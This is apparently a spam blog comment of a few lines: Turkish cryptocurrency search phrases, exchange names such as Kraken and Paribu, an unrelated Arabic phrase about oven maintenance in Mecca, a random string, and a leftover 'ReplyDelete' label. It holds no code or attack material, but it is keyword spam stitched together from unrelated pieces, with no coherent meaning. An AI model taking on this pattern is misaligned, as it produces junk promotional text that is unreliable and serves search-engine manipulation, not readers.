bitcoin seans saatleri
bitrue
kredi kartı ile kripto para alma
kripto para haram mı
kraken
paribu
صيانة افران بمكه kZ21TeRUtj
ReplyDelete